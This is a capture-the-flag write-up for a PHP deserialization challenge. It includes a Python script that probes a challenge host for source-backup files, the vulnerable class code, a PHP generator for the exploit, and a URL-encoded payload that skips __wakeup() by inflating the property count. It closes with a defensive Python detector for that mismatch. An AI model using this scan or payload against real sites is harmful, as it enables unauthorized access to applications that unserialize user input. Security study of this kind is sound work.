[极客大挑战 2019]PHP (Geek Challenge 2019: PHP)

Posted H3rmesk1t


Topic tested

PHP deserialization

Approach

The challenge hints at the good habit of keeping a backup file, so we run a script to look for one.

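# Common file extensions for website source backups
# tar
# tar.gz
# zip
# rar
# Common file names for website source backups
# web
# website
# backup
# back
# www
# wwwroot
# temp
import requests

# Challenge instance URL; the trailing slash is stripped so the join below does not produce "//"
url = "http://fa5574d9-08a0-4542-bdb3-b87a78f78258.node3.buuoj.cn/".rstrip("/")

li1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']
li2 = ['tar', 'tar.gz', 'zip', 'rar']
for i in li1:
    for j in li2:
        # Try every name/extension combination, e.g. <url>/www.zip
        url_final = url + "/" + i + "." + j
        r = requests.get(url_final)
        # The printed response shows the HTTP status for each candidate
        print(r, ' ', i, ' ', j)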

We find that a www.zip backup file exists, so we download it and take a look. The flag in flag.php is obviously fake, so we focus on class.php.

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
?>

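Analysis of the code logic:
password must be 100 and username must be admin, and the __wakeup() function has to be bypassed. When a serialized string is deserialized and the declared number of properties is greater than the actual number of properties, execution of __wakeup() is skipped. Note that fields declared private are visible only inside the class that declares them, and not in its subclasses or in object instances of the class. For that reason, when a private field is serialized, a \0 prefix is added before both the class name and the field name, and the string length includes the length of the added prefixes. In PHP versions above 7.1 we can also get around this by changing private and protected fields to public.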

Payload

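<?php
// Same class name and private fields as class.php, set to the values __destruct() checks for
class Name{
	private $username = 'admin';
	private $password = '100';
}

// serialize() emits a property count of 2; declaring 3 makes unserialize() skip __wakeup()
$a = str_replace(":2:", ":3:", serialize(new Name));
// URL-encode so the \0 bytes in the private field names survive in the query string
$a = urlencode($a);
echo $a;
?>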

Payload:O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D
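
As an added example (not part of the original write-up or the challenge code), this Python sketch shows how a defender could flag such a request: it walks a PHP serialized value and reports every object whose declared property count differs from the properties actually present, the mismatch that the __wakeup() bypass relies on. The function names are hypothetical, and `C:`/`E:` values are treated as unsupported.

```python
from urllib.parse import unquote_to_bytes

def _field(buf, pos, sep):
    """Return (bytes up to sep, offset just past sep)."""
    end = buf.index(sep, pos)
    return buf[pos:end], end + 1

def _walk(buf, pos, findings):
    """Parse one serialized value at pos and return the offset after it."""
    tag = buf[pos:pos + 1]
    if tag == b"N":                                  # N;
        return pos + 2
    if tag in (b"b", b"i", b"d", b"r", b"R"):        # e.g. i:100;
        return _field(buf, pos + 2, b";")[1]
    if tag == b"s":                                  # s:<bytes>:"...";
        n, pos = _field(buf, pos + 2, b":")
        return pos + int(n) + 3                      # quote, body, quote, ';'
    if tag not in (b"a", b"O"):
        raise ValueError(f"unsupported or truncated value at offset {pos}")
    cls, pos = None, pos + 2
    if tag == b"O":                                  # O:<len>:"<class>":<n>:{...}
        n, pos = _field(buf, pos, b":")
        cls = buf[pos + 1:pos + 1 + int(n)].decode(errors="replace")
        pos += int(n) + 3                            # quote, name, quote, ':'
    declared, pos = _field(buf, pos, b":")
    pos += 1                                         # skip '{'
    actual = 0
    while buf[pos:pos + 1] != b"}":
        pos = _walk(buf, pos, findings)              # property name / array key
        pos = _walk(buf, pos, findings)              # its value
        actual += 1
    if cls is not None and actual != int(declared):
        findings.append((cls, int(declared), actual))
    return pos + 1                                   # skip '}'

def count_mismatches(param_value):
    """Return [(class, declared, actual)] for objects with a wrong property count."""
    findings = []
    _walk(unquote_to_bytes(param_value), 0, findings)
    return findings

# Value shown on this page, plus a constructed well-formed twin (count back to 2).
PAGE_VALUE = ("O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3B"
              "s%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3B"
              "s%3A3%3A%22100%22%3B%7D")
WELL_FORMED = PAGE_VALUE.replace("%22%3A3%3A%7B", "%22%3A2%3A%7B")

if __name__ == "__main__":
    print(count_mismatches(PAGE_VALUE), count_mismatches(WELL_FORMED))
```

Input that cannot be parsed raises ValueError, which a caller screening the `select` parameter can treat as a reason to reject the request.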